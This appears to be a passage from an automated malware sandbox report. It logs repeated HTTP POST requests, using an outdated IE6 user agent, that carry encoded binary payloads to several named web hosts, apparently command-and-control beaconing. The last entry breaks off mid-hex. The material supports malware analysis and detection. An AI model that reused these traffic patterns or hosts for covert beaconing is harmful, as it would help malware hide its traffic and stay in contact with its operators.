                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 57 46 45 70 43 59 31 51 59 38 75 6c 48 7a 52 59 42 44 68 58 41 45 59 41 71 34 62 37 4d 76 56 75 45 59 71 4f 67 38 4b 5a 57 6e 54 65 53 68 52 4b 46 41 42 71 75 51 33 50 65 4c 47 59 39 6e 52 43 77 71 6d 6b 38 32 4b 64 76 65 4d 4b 7a 42 39 6d 42 4f 6a 4d 6f 4c 51 7a 50 49 69 63 48 47 79 70 79 72 33 33 37 7a 5a 39 31 53 78 4c 33 52 71 41 66 49 48 47 2b 4b 76 4f 76 53 5a 61 4c 47 73 33 35 6f 37 38 67 39 58 49 74 47 36 2b 33 79 6a 63 55 54 56 61 51 75 63 6b 44 41 7a 6c 77 7a 57 63 4c 55 6c 4f 2b 52 6e 6b 4b 73 52 32 62 4a 62 49 46 63 6d 42 73 68 4b 45 59 57 66 38 37 4f 6a 46 47 42 4d 59 32 44 59 36 49 4c 4c 71 31 65 74 37 42 6f 33 4c 6b 71 5a 41 62 50 79 7a 41 47 37 4c 33 76 2b 76 75 4f 69 45 4a 64 6d 76 4b 45 4c 63 74 4b 38 44 54 46 2f 68 44 58 78 62 57 7a 65 6b 6c 66 75 57 47 79 35 44 76 73 4e 54 72 36 73 70 54 63 35 39 66 37 61 54 33 50 2b 54 67 45 56 37 64 4c 34 7a 2f 56 4e 67 51 4a 72 34 77 50 52 32 35 79 4a 62 51 43 67 58 4c 55 41 68 57 65 67 58 4a 67 56 2f 37 6d 39 50 65 44 71 2f 55 36 62 34 6e 74 31 38 79 56 30 57 72 6c 6e 73 33 54 66 73 65 43 34 4c 34 58 74 30 2b 42 6e 47 4b 72 50 41 64 75 4d 65 35 36 4c 53 4b 2b 34 4a 33 6d 74 6a 31 75 61 32 35 61 49 4f 34 68 56 6f 72 75 64 45 46 42 34 6f 55 44 78 73 38 4b 56 62 46 64 73 46 6b 48 59 57 4b 44 36 50 38 69 74 52 57 71 6c 69 6a 68 50 64 30 4c 69 53 7a 76 50 35 63 7a 44 67 4f 5a 51 4f 5a 6d 6a 74 66 51 63 42 71 38 4f 79 58 62 7a 59 79 79 4c 64 4f 73 77 43 71 31 67 41 7a 44 34 66 35 7a 4a 54 76 61 46 38 72 70 31 49 74 39 39 61 75 30 42 34 58 46 39 53 78 52 33 42 61 45 57 72 74 7a 34 4d 52 63 51 4d 71 54 2b 62 73 39 67 76 41 48 36 4f 6c 76 2b 73 51 57 34 37 2f 73 2f 46 74 50 56 41 46 41 68 45 4b 34 6f 4c 54 4a 55 37 Data Ascii: WFEpCY1QY8ulHzRYBDhXAEYAq4b7MvVuEYqOg8KZWnTeShRKFABquQ3PeLGY9nRCwqmk82KdveMKzB9mBOjMoLQzPIicHGypyr337zZ91SxL3RqAfIHG+KvOvSZaLGs35o78g9XItG6+3yjcUTVaQuckDAzlwzWcLUlO+RnkKsR2bJbIFcmBshKEYWf87OjFGBMY2DY6ILLq1et7Bo3LkqZAbPyzAG7L3v+vuOiEJdmvKELctK8DTF/hDXxbWzeklfuWGy5DvsNTr6spTc59f7aT3P+TgEV7dL4z/VNgQJr4wPR25yJbQCgXLUAhWegXJgV/7m9PeDq/U6b4nt18yV0Wrlns3TfseC4L4Xt0+BnGKrPAduMe56LSK+4J3mtj1ua25aIO4hVorudEFB4oUDxs8KVbFdsFkHYWKD6P8itRWqlijhPd0LiSzvP5czDgOZQOZmjtfQcBq8OyXbzYyyLdOswCq1gAzD4f5zJTvaF8rp1It99au0B4XF9SxR3BaEWrtz4MRcQMqT+bs9gvAH6Olv+sQW47/s/FtPVAFAhEK4oLTJU7
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheData Raw: 55 78 54 71 50 61 46 6d 56 4d 74 50 47 41 31 39 41 45 39 56 4e 6e 72 48 49 63 47 66 6c 4e 66 49 5a 52 39 37 4b 54 41 75 43 32 6e 58 74 41 76 4e 6d 42 4e 62 52 51 70 58 61 62 6c 34 4d 39 6a 33 38 50 4e 61 57 72 70 65 76 5a 75 56 70 30 39 59 66 33 50 32 43 77 53 78 70 7a 63 48 52 41 79 72 6a 59 47 48 7a 4d 49 55 7a 4b 6d 6a 71 73 4f 39 43 48 6f 59 4f 2f 76 6d 69 72 38 69 72 73 79 6e 78 4b 7a 38 2f 69 4b 6b 32 75 57 73 68 58 5a 2f 45 75 4a 50 33 5a 68 31 67 30 35 4a 44 50 37 48 71 65 74 7a 73 5a 4b 4e 57 45 6f 78 71 47 44 71 43 33 7a 4e 62 44 76 66 48 6d 58 4c 6d 76 6d 49 4b 67 49 62 43 57 43 64 31 69 6c 39 56 6d 67 62 56 6d 35 58 6f 32 4d 4f 51 42 72 72 68 76 35 75 76 64 33 4f 73 4a 6c 79 39 46 65 79 59 79 56 72 43 46 70 2f 6d 54 49 70 4d 70 2f 78 62 5a 33 63 74 2b 70 52 4f 43 78 6a 33 45 6d 35 6f 33 64 44 51 31 50 73 67 49 6e 46 56 38 64 33 73 43 70 62 78 42 4c 52 72 62 5a 44 2f 42 61 32 6c 79 4d 47 46 4d 73 38 4f 71 36 34 49 59 55 37 51 53 74 49 72 51 4f 70 4a 58 4d 77 71 73 5a 39 4e 4b 49 54 53 58 37 4e 43 34 2b 71 72 54 71 51 62 42 55 4e 32 32 6c 38 66 45 2f 6c 58 49 77 34 68 4d 55 74 35 53 6f 4c 62 66 55 52 43 33 67 66 61 38 41 43 5a 6c 6d 37 37 6a 32 38 6c 6c 4f 6e 77 4b 37 44 61 61 52 31 76 43 6d 35 54 38 75 34 72 58 2f 6e 70 45 52 36 32 4f 62 67 72 4f 6e 4b 30 35 67 6d 6c 69 2b 75 73 79 6e 51 48 7a 66 33 74 4c 32 44 4f 57 72 32 5a 30 32 35 42 75 44 42 62 35 67 2f 51 52 74 44 58 4d 36 4b 6e 6c 56 77 31 45 44 38 43 37 66 53 6f 36 53 30 70 33 72 6b 34 72 5a 35 32 73 6a 58 74 35 45 58 44 6a 45 39 2f 56 58 62 43 47 71 54 4b 6e 61 67 2b 63 37 53 4a 50 30 46 31 62 37 67 61 6b 7a 4d 72 32 6c 70 53 59 65 57 45 38 52 47 6c 7a 58 77 52 58 45 4d 34 4f 39 70 68 46 2f 70 32 77 3d 3d Data Ascii: UxTqPaFmVMtPGA19AE9VNnrHIcGflNfIZR97KTAuC2nXtAvNmBNbRQpXabl4M9j38PNaWrpevZuVp09Yf3P2CwSxpzcHRAyrjYGHzMIUzKmjqsO9CHoYO/vmir8irsynxKz8/iKk2uWshXZ/EuJP3Zh1g05JDP7HqetzsZKNWEoxqGDqC3zNbDvfHmXLmvmIKgIbCWCd1il9VmgbVm5Xo2MOQBrrhv5uvd3OsJly9FeyYyVrCFp/mTIpMp/xbZ3ct+pROCxj3Em5o3dDQ1PsgInFV8d3sCpbxBLRrbZD/Ba2lyMGFMs8Oq64IYU7QStIrQOpJXMwqsZ9NKITSX7NC4+qrTqQbBUN22l8fE/lXIw4hMUt5SoLbfURC3gfa8ACZlm77j28llOnwK7DaaR1vCm5T8u4rX/npER62ObgrOnK05gmli+usynQHzf3tL2DOWr2Z025BuDBb5g/QRtDXM6KnlVw1ED8C7fSo6S0p3rk4rZ52sjXt5EXDjE9/VXbCGqTKnag+c7SJP0F1b7gakzMr2lpSYeWE8RGlzXwRXEM4O9phF/p2w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 6e 67 67 44 43 70 78 58 59 38 74 54 46 55 34 48 78 34 36 65 73 79 38 4e 67 57 32 30 5a 49 65 7a 6b 42 49 48 5a 34 32 6e 45 4e 75 49 6d 4d 6e 31 30 57 64 2b 6c 42 37 66 74 65 48 48 39 6f 34 63 65 49 64 73 36 6e 58 6b 53 63 72 58 6d 76 6b 4c 65 70 68 79 62 2f 32 75 62 42 42 73 6d 33 55 49 6e 53 37 65 7a 47 57 39 74 56 52 53 48 6c 70 43 44 76 53 49 57 31 66 68 6d 35 36 6b 30 45 59 76 2b 46 4e 7a 45 76 32 5a 4d 4c 35 68 6f 42 69 51 45 30 62 67 50 55 46 59 55 54 4c 55 63 42 54 42 79 36 34 6b 6e 63 79 4a 6b 2b 55 79 70 64 34 46 71 55 67 79 78 6b 54 2f 54 61 74 47 67 45 34 52 66 65 77 79 51 68 44 36 6c 45 42 32 76 6e 6e 32 65 4a 32 35 65 4a 4c 48 39 4a 33 69 6a 41 58 42 55 6d 47 63 41 64 4f 5a 65 75 48 74 6e 62 6f 70 4e 5a 51 43 45 4c 51 68 41 6c 6b 4a 69 75 32 71 65 68 65 59 7a 2b 63 78 34 43 72 78 6e 2b 32 4c 59 42 64 7a 51 44 53 55 6b 7a 76 45 62 2f 59 31 31 53 69 55 52 43 66 4d 62 54 63 56 51 33 64 68 45 49 56 6c 6e 39 36 69 65 58 6a 6f 45 5a 51 2b 50 7a 4a 2b 74 6a 59 44 4e 44 6d 56 5a 6b 77 66 70 5a 57 30 66 51 46 51 76 66 53 4d 50 76 6f 4e 76 32 70 2b 7a 58 4a 35 51 4f 67 76 77 6c 6d 41 56 64 73 34 76 75 48 6e 38 2b 63 4e 71 41 54 44 71 30 4d 70 6b 6e 44 37 39 54 58 53 67 4e 2b 69 65 6c 38 52 56 62 4f 70 6b 34 57 43 71 4a 34 58 30 57 62 79 2f 46 45 54 5a 2f 50 76 42 46 4b 52 51 67 75 6f 41 31 62 74 74 46 66 64 57 49 58 50 35 64 50 6e 4a 42 6c 46 2f 51 49 4b 4b 58 6a 6a 64 6c 65 30 7a 6a 79 50 68 4e 30 75 69 67 7a 79 41 51 68 4d 70 32 32 4f 59 55 78 5a 57 61 36 36 33 50 31 4f 76 75 79 6a 6a 66 2b 7a 42 6d 76 79 76 31 50 4b 2b 6f 6d 74 4e 72 67 67 56 46 53 54 54 5a 5a 75 42 6b 64 72 53 43 58 64 33 35 31 63 32 75 33 6f 70 59 76 37 43 68 6e 4f 45 61 2b 4a 6a 31 52 34 47 67 72 38 39 53 72 35 46 6d 43 64 4b 68 76 49 42 74 45 6c 52 72 79 71 4d 53 4d 4f Data Ascii: nggDCpxXY8tTFU4Hx46esy8NgW20ZIezkBIHZ42nENuImMn10Wd+lB7fteHH9o4ceIds6nXkScrXmvkLephyb/2ubBBsm3UInS7ezGW9tVRSHlpCDvSIW1fhm56k0EYv+FNzEv2ZML5hoBiQE0bgPUFYUTLUcBTBy64kncyJk+Uypd4FqUgyxkT/TatGgE4RfewyQhD6lEB2vnn2eJ25eJLH9J3ijAXBUmGcAdOZeuHtnbopNZQCELQhAlkJiu2qeheYz+cx4Crxn+2LYBdzQDSUkzvEb/Y11SiURCfMbTcVQ3dhEIVln96ieXjoEZQ+PzJ+tjYDNDmVZkwfpZW0fQFQvfSMPvoNv2p+zXJ5QOgvwlmAVds4vuHn8+cNqATDq0MpknD79TXSgN+iel8RVbOpk4WCqJ4X0Wby/FETZ/PvBFKRQguoA1bttFfdWIXP5dPnJBlF/QIKKXjjdle0zjyPhN0uigzyAQhMp22OYUxZWa663P1Ovuyjjf+zBmvyv1PK+omtNrggVFSTTZZuBkdrSCXd351c2u3opYv7ChnOEa+Jj1R4Ggr89Sr5FmCdKhvIBtElRryqMSMO
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.koz1.netCache-Control: no-cacheData Raw: 69 37 33 65 47 6f 57 54 57 38 74 58 69 79 2f 74 72 47 2f 5a 64 50 35 56 34 4b 64 54 62 63 71 39 69 55 44 52 34 73 58 55 30 76 44 4a 4f 6a 41 67 70 39 62 76 39 56 4d 78 71 64 61 62 44 39 50 59 39 71 51 48 31 30 6a 6c 61 6d 72 55 31 61 56 76 39 36 57 67 4e 7a 38 46 55 6f 39 2b 53 62 4f 74 55 70 59 37 76 4e 58 67 32 35 6d 4e 63 70 32 70 44 62 73 6b 64 5a 4e 4f 64 7a 67 34 65 79 56 59 64 62 6d 6b 56 2b 4c 2f 42 76 53 6a 6a 64 7a 77 2b 52 41 69 4f 79 7a 57 42 33 56 4c 31 6b 79 2f 71 55 57 76 4c 44 64 77 48 55 68 46 55 6d 6e 79 74 4d 46 73 52 6b 71 4c 6f 37 69 4c 6e 54 67 57 6a 63 41 37 6a 43 41 6e 46 66 6f 43 41 58 59 75 2f 70 77 45 31 73 4f 32 45 42 69 52 68 46 4d 59 50 38 71 37 48 2f 44 51 6f 72 59 6d 48 4a 54 61 73 50 5a 2f 41 41 51 37 71 47 66 62 64 70 46 44 2f 4f 70 59 73 69 32 54 50 55 6b 66 46 50 43 65 77 4d 55 41 4e 49 31 73 35 70 78 63 2f 62 57 4e 6d 4e 49 65 72 76 57 53 79 4c 51 62 4e 6e 6a 38 5a 42 56 36 53 67 2f 36 45 4d 69 6a 79 62 44 37 4e 58 57 4f 51 49 45 6a 77 64 54 36 61 75 5a 78 4b 2b 57 38 6d 41 73 39 47 63 68 58 51 39 6c 6a 72 54 33 6f 43 6a 50 66 54 64 79 46 79 51 52 2b 53 54 6f 66 59 65 4a 66 53 33 79 63 66 55 43 6b 35 49 4e 57 30 4c 69 6a 6e 47 34 39 6f 72 48 4c 62 52 4e 45 6b 65 4b 61 4f 59 6b 66 6e 63 35 2f 39 72 4a 68 62 74 4a 53 6d 49 4f 4f 31 34 66 6a 41 59 32 68 57 45 30 68 42 5a 31 38 39 51 34 6e 74 58 41 32 69 61 2b 35 38 6e 33 49 6c 52 62 50 74 65 51 72 57 30 71 49 73 7a 2b 59 59 45 2f 7a 4c 71 42 39 63 6d 41 6f 47 55 37 2b 5a 63 4b 72 58 30 4a 31 58 6e 53 57 63 31 6d 6f 51 30 5a 7a 65 7a 53 50 4e 75 6d 33 67 58 34 4b 4e 48 44 78 58 62 2b 6e 51 5a 4d 4c 71 67 3d 3d Data Ascii: i73eGoWTW8tXiy/trG/ZdP5V4KdTbcq9iUDR4sXU0vDJOjAgp9bv9VMxqdabD9PY9qQH10jlamrU1aVv96WgNz8FUo9+SbOtUpY7vNXg25mNcp2pDbskdZNOdzg4eyVYdbmkV+L/BvSjjdzw+RAiOyzWB3VL1ky/qUWvLDdwHUhFUmnytMFsRkqLo7iLnTgWjcA7jCAnFfoCAXYu/pwE1sO2EBiRhFMYP8q7H/DQorYmHJTasPZ/AAQ7qGfbdpFD/OpYsi2TPUkfFPCewMUANI1s5pxc/bWNmNIervWSyLQbNnj8ZBV6Sg/6EMijybD7NXWOQIEjwdT6auZxK+W8mAs9GchXQ9ljrT3oCjPfTdyFyQR+STofYeJfS3ycfUCk5INW0LijnG49orHLbRNEkeKaOYkfnc5/9rJhbtJSmIOO14fjAY2hWE0hBZ189Q4ntXA2ia+58n3IlRbPteQrW0qIsz+YYE/zLqB9cmAoGU7+ZcKrX0J1XnSWc1moQ0ZzezSPNum3gX4KNHDxXb+nQZMLqg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 57 46 45 70 43 59 31 51 59 38 75 6c 48 7a 52 59 42 44 68 58 41 45 59 41 71 34 62 37 4d 76 56 75 45 59 71 4f 67 38 4b 5a 57 6e 54 65 53 68 52 4b 46 41 42 71 75 51 33 50 65 4c 47 59 39 6e 52 43 77 71 6d 6b 38 32 4b 64 76 65 4d 4b 7a 42 39 6d 42 4f 6a 4d 6f 4c 51 7a 50 49 69 63 48 47 79 70 79 72 33 33 37 7a 5a 39 31 53 78 4c 33 52 71 41 66 49 48 47 2b 4b 76 4f 76 53 5a 61 4c 47 73 33 35 6f 37 38 67 39 58 49 74 47 36 2b 33 79 6a 63 55 54 56 61 51 75 63 6b 44 41 7a 6c 77 7a 57 63 4c 55 6c 4f 2b 52 6e 6b 4b 73 52 32 62 4a 62 49 46 63 6d 42 73 68 4b 45 59 57 66 38 37 4f 6a 46 47 42 4d 59 32 44 59 36 49 4c 4c 71 31 65 74 37 42 6f 33 4c 6b 71 5a 41 62 50 79 7a 41 47 37 4c 33 76 2b 76 75 4f 69 45 4a 64 6d 76 4b 45 4c 63 74 4b 38 44 54 46 2f 68 44 58 78 62 57 7a 65 6b 6c 66 75 57 47 79 35 44 76 73 4e 54 72 36 73 70 54 63 35 39 66 37 61 54 33 50 2b 54 67 45 56 37 64 4c 34 7a 2f 56 4e 67 51 4a 72 34 77 50 52 32 35 79 4a 62 51 43 67 58 4c 55 41 68 57 65 67 58 4a 67 56 2f 37 6d 39 50 65 44 71 2f 55 36 62 34 6e 74 31 38 79 56 30 57 72 6c 6e 73 33 54 66 73 65 43 34 4c 34 58 74 30 2b 42 6e 47 4b 72 50 41 64 75 4d 65 35 36 4c 53 4b 2b 34 4a 33 6d 74 6a 31 75 61 32 35 61 49 4f 34 68 56 6f 72 75 64 45 46 42 34 6f 55 44 78 73 38 4b 56 62 46 64 73 46 6b 48 59 57 4b 44 36 50 38 69 74 52 57 71 6c 69 6a 68 50 64 30 4c 69 53 7a 76 50 35 63 7a 44 67 4f 5a 51 4f 5a 6d 6a 74 66 51 63 42 71 38 4f 79 58 62 7a 59 79 79 4c 64 4f 73 77 43 71 31 67 41 7a 44 34 66 35 7a 4a 54 76 61 46 38 72 70 31 49 74 39 39 61 75 30 42 34 58 46 39 53 78 52 33 42 61 45 57 72 74 7a 34 4d 52 63 51 4d 71 54 2b 62 73 39 67 76 41 48 36 4f 6c 76 2b 73 51 57 34 37 2f 73 2f 46 74 50 56 41 46 41 68 45 4b 34 6f 4c 54 4a 55 37 Data Ascii: WFEpCY1QY8ulHzRYBDhXAEYAq4b7MvVuEYqOg8KZWnTeShRKFABquQ3PeLGY9nRCwqmk82KdveMKzB9mBOjMoLQzPIicHGypyr337zZ91SxL3RqAfIHG+KvOvSZaLGs35o78g9XItG6+3yjcUTVaQuckDAzlwzWcLUlO+RnkKsR2bJbIFcmBshKEYWf87OjFGBMY2DY6ILLq1et7Bo3LkqZAbPyzAG7L3v+vuOiEJdmvKELctK8DTF/hDXxbWzeklfuWGy5DvsNTr6spTc59f7aT3P+TgEV7dL4z/VNgQJr4wPR25yJbQCgXLUAhWegXJgV/7m9PeDq/U6b4nt18yV0Wrlns3TfseC4L4Xt0+BnGKrPAduMe56LSK+4J3mtj1ua25aIO4hVorudEFB4oUDxs8KVbFdsFkHYWKD6P8itRWqlijhPd0LiSzvP5czDgOZQOZmjtfQcBq8OyXbzYyyLdOswCq1gAzD4f5zJTvaF8rp1It99au0B4XF9SxR3BaEWrtz4MRcQMqT+bs9gvAH6Olv+sQW47/s/FtPVAFAhEK4oLTJU7
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 6e 67 67 44 43 70 78 58 59 38 74 54 46 55 34 48 78 34 36 65 73 79 38 4e 67 57 32 30 5a 49 65 7a 6b 42 49 48 5a 34 32 6e 45 4e 75 49 6d 4d 6e 31 30 57 64 2b 6c 42 37 66 74 65 48 48 39 6f 34 63 65 49 64 73 36 6e 58 6b 53 63 72 58 6d 76 6b 4c 65 70 68 79 62 2f 32 75 62 42 42 73 6d 33 55 49 6e 53 37 65 7a 47 57 39 74 56 52 53 48 6c 70 43 44 76 53 49 57 31 66 68 6d 35 36 6b 30 45 59 76 2b 46 4e 7a 45 76 32 5a 4d 4c 35 68 6f 42 69 51 45 30 62 67 50 55 46 59 55 54 4c 55 63 42 54 42 79 36 34 6b 6e 63 79 4a 6b 2b 55 79 70 64 34 46 71 55 67 79 78 6b 54 2f 54 61 74 47 67 45 34 52 66 65 77 79 51 68 44 36 6c 45 42 32 76 6e 6e 32 65 4a 32 35 65 4a 4c 48 39 4a 33 69 6a 41 58 42 55 6d 47 63 41 64 4f 5a 65 75 48 74 6e 62 6f 70 4e 5a 51 43 45 4c 51 68 41 6c 6b 4a 69 75 32 71 65 68 65 59 7a 2b 63 78 34 43 72 78 6e 2b 32 4c 59 42 64 7a 51 44 53 55 6b 7a 76 45 62 2f 59 31 31 53 69 55 52 43 66 4d 62 54 63 56 51 33 64 68 45 49 56 6c 6e 39 36 69 65 58 6a 6f 45 5a 51 2b 50 7a 4a 2b 74 6a 59 44 4e 44 6d 56 5a 6b 77 66 70 5a 57 30 66 51 46 51 76 66 53 4d 50 76 6f 4e 76 32 70 2b 7a 58 4a 35 51 4f 67 76 77 6c 6d 41 56 64 73 34 76 75 48 6e 38 2b 63 4e 71 41 54 44 71 30 4d 70 6b 6e 44 37 39 54 58 53 67 4e 2b 69 65 6c 38 52 56 62 4f 70 6b 34 57 43 71 4a 34 58 30 57 62 79 2f 46 45 54 5a 2f 50 76 42 46 4b 52 51 67 75 6f 41 31 62 74 74 46 66 64 57 49 58 50 35 64 50 6e 4a 42 6c 46 2f 51 49 4b 4b 58 6a 6a 64 6c 65 30 7a 6a 79 50 68 4e 30 75 69 67 7a 79 41 51 68 4d 70 32 32 4f 59 55 78 5a 57 61 36 36 33 50 31 4f 76 75 79 6a 6a 66 2b 7a 42 6d 76 79 76 31 50 4b 2b 6f 6d 74 4e 72 67 67 56 46 53 54 54 5a 5a 75 42 6b 64 72 53 43 58 64 33 35 31 63 32 75 33 6f 70 59 76 37 43 68 6e 4f 45 61 2b 4a 6a 31 52 34 47 67 72 38 39 53 72 35 46 6d 43 64 4b 68 76 49 42 74 45 6c 52 72 79 71 4d 53 4d 4f Data Ascii: nggDCpxXY8tTFU4Hx46esy8NgW20ZIezkBIHZ42nENuImMn10Wd+lB7fteHH9o4ceIds6nXkScrXmvkLephyb/2ubBBsm3UInS7ezGW9tVRSHlpCDvSIW1fhm56k0EYv+FNzEv2ZML5hoBiQE0bgPUFYUTLUcBTBy64kncyJk+Uypd4FqUgyxkT/TatGgE4RfewyQhD6lEB2vnn2eJ25eJLH9J3ijAXBUmGcAdOZeuHtnbopNZQCELQhAlkJiu2qeheYz+cx4Crxn+2LYBdzQDSUkzvEb/Y11SiURCfMbTcVQ3dhEIVln96ieXjoEZQ+PzJ+tjYDNDmVZkwfpZW0fQFQvfSMPvoNv2p+zXJ5QOgvwlmAVds4vuHn8+cNqATDq0MpknD79TXSgN+iel8RVbOpk4WCqJ4X0Wby/FETZ/PvBFKRQguoA1bttFfdWIXP5dPnJBlF/QIKKXjjdle0zjyPhN0uigzyAQhMp22OYUxZWa663P1Ovuyjjf+zBmvyv1PK+omtNrggVFSTTZZuBkdrSCXd351c2u3opYv7ChnOEa+Jj1R4Ggr89Sr5FmCdKhvIBtElRryqMSMO
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 76 54 59 6b 6e 74 41 58 67 63 76 44 72 30 58 72 59 77 6a 4b 56 49 4f 6a 6c 2b 6e 34 6d 69 31 4a 42 43 54 6b 2f 41 6f 35 69 44 6a 4b 33 33 43 65 64 43 50 47 5a 63 4d 4c 70 2b 33 52 4a 76 79 6a 4e 37 52 50 37 5a 77 6a 56 51 44 4c 6a 35 64 39 31 63 37 62 73 4b 64 62 2f 4b 6f 41 74 77 7a 4d 6c 32 47 55 66 4a 34 45 47 50 63 48 2f 78 6f 7a 42 74 4c 4c 4d 42 2f 6c 6d 6d 76 2f 36 58 78 66 57 6d 39 43 33 4c 47 68 7a 42 71 4c 4a 32 75 2f 58 6c 48 33 4e 48 39 7a 65 41 37 65 69 78 6a 6a 6d 4a 53 31 4f 6f 71 39 70 78 55 4b 47 6a 39 56 4e 32 49 46 6b 2b 6a 7a 53 7a 78 66 64 46 35 65 68 75 49 70 47 65 6f 5a 70 56 47 4d 52 38 44 6e 42 69 4a 4e 6c 4c 67 61 75 35 52 75 69 4b 53 46 6b 4f 41 4e 45 44 6d 49 43 53 57 2b 6c 62 52 4f 64 52 53 6f 62 62 59 77 2f 50 32 4b 74 5a 4f 47 36 45 5a 41 56 6a 2b 35 42 68 73 2b 47 34 4a 58 54 62 52 37 53 36 38 51 44 64 63 38 6b 2b 33 2f 64 62 4e 67 56 66 2b 65 56 68 63 34 44 65 44 2f 59 62 75 34 38 43 37 66 33 31 4c 4a 61 38 4e 74 62 64 67 64 6a 73 72 56 53 33 64 54 6e 42 76 73 41 36 55 6a 39 49 71 65 41 43 4c 78 64 54 54 52 79 50 36 62 32 70 46 39 2f 62 55 59 45 54 37 71 64 72 46 66 42 69 51 72 74 57 35 6e 77 33 71 52 5a 33 6f 61 5a 64 2f 74 35 35 35 32 30 70 4f 39 38 65 47 49 71 31 51 78 32 51 6e 2f 75 76 36 48 39 6a 78 51 59 66 79 6b 74 36 31 43 7a 7a 41 58 70 4a 37 63 33 56 66 54 66 42 38 32 59 4a 57 7a 6e 53 7a 38 35 46 6d 66 30 36 68 61 54 6b 6a 4c 74 78 56 6b 4d 45 6e 78 58 64 46 6f 71 6b 4f 4c 58 74 41 4d 57 75 55 62 7a 2b 35 5a 70 2b 33 47 30 4a 74 37 6c 6c 72 5a 6a 66 34 31 4a 6c 67 45 5a 31 4a 74 6a 75 4e 38 34 74 74 67 53 64 32 59 79 37 2b 65 64 38 65 74 4a 79 61 53 50 49 4f 66 65 77 7a 56 6b 59 52 6f 5a 37 30 38 66 74 37 44 46 66 6f 6b 5a 47 50 42 36 57 48 4b 77 67 59 31 44 33 59 7a 32 51 3d 3d Data Ascii: vTYkntAXgcvDr0XrYwjKVIOjl+n4mi1JBCTk/Ao5iDjK33CedCPGZcMLp+3RJvyjN7RP7ZwjVQDLj5d91c7bsKdb/KoAtwzMl2GUfJ4EGPcH/xozBtLLMB/lmmv/6XxfWm9C3LGhzBqLJ2u/XlH3NH9zeA7eixjjmJS1Ooq9pxUKGj9VN2IFk+jzSzxfdF5ehuIpGeoZpVGMR8DnBiJNlLgau5RuiKSFkOANEDmICSW+lbROdRSobbYw/P2KtZOG6EZAVj+5Bhs+G4JXTbR7S68QDdc8k+3/dbNgVf+eVhc4DeD/Ybu48C7f31LJa8NtbdgdjsrVS3dTnBvsA6Uj9IqeACLxdTTRyP6b2pF9/bUYET7qdrFfBiQrtW5nw3qRZ3oaZd/t55520pO98eGIq1Qx2Qn/uv6H9jxQYfykt61CzzAXpJ7c3VfTfB82YJWznSz85Fmf06haTkjLtxVkMEnxXdFoqkOLXtAMWuUbz+5Zp+3G0Jt7llrZjf41JlgEZ1JtjuN84ttgSd2Yy7+ed8etJyaSPIOfewzVkYRoZ708ft7DFfokZGPB6WHKwgY1D3Yz2Q==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheData Raw: 62 4d 54 32 66 4c 58 30 6d 4d 76 75 78 2b 34 6c 48 48 35 67 61 71 37 43 30 6e 46 44 48 76 2f 4e 75 65 54 34 42 39 77 32 56 56 4c 72 45 46 4b 78 43 2b 54 58 57 4c 49 51 4f 61 7a 4a 57 74 35 53 42 6c 45 69 6a 34 64 69 2b 56 35 50 47 71 34 7a 48 6b 56 2b 2b 74 54 4d 44 72 49 35 55 55 6e 37 74 44 6b 4d 41 71 6a 35 53 57 50 50 31 79 5a 52 42 6f 4b 61 4a 46 39 43 78 47 44 73 2f 6e 32 43 62 46 69 72 62 52 34 68 4c 4e 64 4c 6a 46 66 35 33 55 6c 66 64 4f 6d 7a 6c 37 4b 57 6c 33 51 6f 52 4f 33 56 37 37 76 57 41 36 45 4c 77 39 4d 71 72 78 42 6a 63 39 76 69 53 34 39 47 5a 54 63 71 38 79 4b 46 73 69 2b 77 6c 42 66 49 78 52 61 74 59 36 30 38 33 33 69 4d 51 37 45 6e 4c 67 48 49 75 67 35 4e 64 71 5a 69 7a 61 56 51 66 49 4c 4b 63 32 57 59 61 72 45 34 47 4f 72 37 59 33 32 66 64 38 59 49 57 4f 38 69 42 4e 73 4a 56 6e 44 32 4a 31 39 53 2b 39 6f 55 71 55 54 39 49 68 71 53 46 65 72 34 37 4f 4b 59 32 47 7a 39 51 75 70 41 55 38 68 6f 6c 49 33 72 50 4a 4b 76 6b 6f 72 56 6a 68 52 5a 2f 43 4e 2f 52 4f 45 63 4a 54 78 4b 2f 59 75 51 4c 52 70 6a 69 46 63 75 73 38 78 49 46 56 6a 68 44 6a 6f 72 7a 4a 78 38 6d 55 37 38 67 52 48 6f 59 57 49 50 6e 32 72 61 59 35 66 57 4b 6f 4c 33 46 47 57 63 32 7a 69 6f 2b 68 35 35 79 76 44 39 6a 58 77 76 30 38 6b 75 76 5a 70 43 72 36 53 58 48 30 74 65 66 6c 66 73 34 35 75 34 35 69 38 63 74 6d 33 66 44 6e 59 66 4a 